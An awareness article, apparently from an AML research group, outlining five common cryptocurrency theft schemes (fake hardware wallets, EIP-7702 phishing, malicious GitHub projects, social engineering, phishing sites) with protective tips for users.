How your cryptocurrency will be stolen: top 5 popular schemes

Every day, someone falls victim to scammers or hackers and loses their cryptocurrency. GetBlock AML Research has compiled a list of the most popular crypto asset theft schemes in recent times.

1. Fake hardware wallets

Recently, there have been more cases of people getting ripped off after buying fake hardware wallets. For example, one user bought a device called “imToken Secure Cold Wallet” from an unofficial seller for 618 yuan. As soon as they transferred 4,35 bitcoins to it, the money vanished.

Such scams do not require sophisticated technology — they are based on trust and psychological tricks. The essence is simple: fraudsters set up the wallet in advance, write down its secret code, and then sell the device as new. The buyer thinks they are in control of their money, but in reality, the attackers already have access to it.

Usually, the scheme works like this: criminals buy an original wallet, activate it, and write down the secret code (seed phrase). Then they change the instructions, put a fake card with the code inside, and reseal the package so that the device looks new. They sell it through social networks, streams, or second-hand goods platforms. Sometimes scammers simply put a card with a pre-printed code in the box, convincing the buyer that they need to restore the wallet using it. As a result, all the money that the person transfers goes straight into the hands of criminals.

To avoid being scammed:

• Only buy such devices from official sellers.
• Generate the secret code yourself, on the device, and never use ready-made cards with codes.
• If there is a pre-written code in the box, this is a sure sign of a fake.
• Always test a new wallet with a small amount first.
• The main rule is that you only control your money when you create and store the secret code yourself.

2. Phishing via EIP-7702

There have been cases where people have lost all the money in their wallets due to a new scam. Here’s how it works: if criminals get hold of your private key (the main password to your wallet), they connect your address to a fake “contract.” From that moment on, all transfers are automatically redirected to the scammers. Even if you try to withdraw your coins, they will not go to you, but to the address of the attackers.

The main danger is that a person may not notice the trick — everything looks like a normal transaction. Therefore, you need to protect your private keys as much as possible and carefully check who and what you are authorizing before signing each transaction.

3. Malicious projects on GitHub

Many cases of theft are associated with fake “open-source projects” on the Internet. GitHub is a platform where programmers post their code. Malicious actors pretend that their projects are popular and reliable, while hiding viruses inside.

For example:

One user downloaded a project with a bot for Solana. It turned out that the code secretly collected private keys and sent them to a fraudulent website.

In another project, there was a hidden function in the code that, when launched, extracted secrets from the settings file and sent them to attackers.

In the third case, a job candidate was asked to download a project “for a test assignment.” Hidden inside was a virus that collected data from browsers and crypto wallets and could execute commands from attackers.

Signs of forgery:

• The project has many “stars” and “forks,” but the change history is short.
• The code contains suspicious references to packages or programs that are not found in official sources.
• The code is very confusing or hides functions that read private data.
• To protect yourself, never run unknown code on a computer where you store money or passwords. Only do this in a separate, isolated environment.

4. Social engineering

Scammers actively use deception and psychological pressure. They may pretend to be employers, recruiters, or business partners.

Example: one user received a job offer from a supposedly well-known bank. He was invited to a chat, shown “plausible” links and videos. But upon verification, it turned out that the people’s profiles were fake, and the goal was to gain trust and trick the user into installing malicious software.

There are also complex schemes: attackers conduct entire “interviews” with a person to gain trust. In the end, they ask the victim to install a “camera driver” or “test program,” which turns out to be a virus that steals wallets.

There are also quick attacks: for example, the victim was rushing to a meeting and accidentally clicked on a fake Zoom link. As a result, the scammers gained access to her computer and replaced the transaction details, causing her to sign a money transfer directly to their address.

The main thing to remember is that such attacks only work when the person themselves begins to cooperate with the scammers. Therefore, always verify the identity of the people you are talking to and never install questionable programs.

5. Phishing sites

Fake websites that look like the real thing are very common. They most often appear through Google ads or old links on social media and forums.

Example: one user searched for the Aave service on Google and clicked on the first link. The website looked identical to the real one, but when the user signed the transaction, their wallet transferred control of their assets to the scammers. The losses amounted to over a million dollars.

Sometimes, attackers intercept old invitations to chats (for example, on Discord). The user thinks they have joined the official community, but in fact ends up in a fake group and gives away access to their assets.

There are also more cunning schemes: fake CAPTCHAs or “I am not a robot” buttons. After clicking, a malicious command is secretly copied to the computer, and the victim inserts it into the terminal themselves, without realizing that they are launching a virus.

The essence of these attacks is the same: to disguise a dangerous action as a familiar one. Therefore, it is important to use only trusted bookmarks and not to click on advertisements or suspicious links.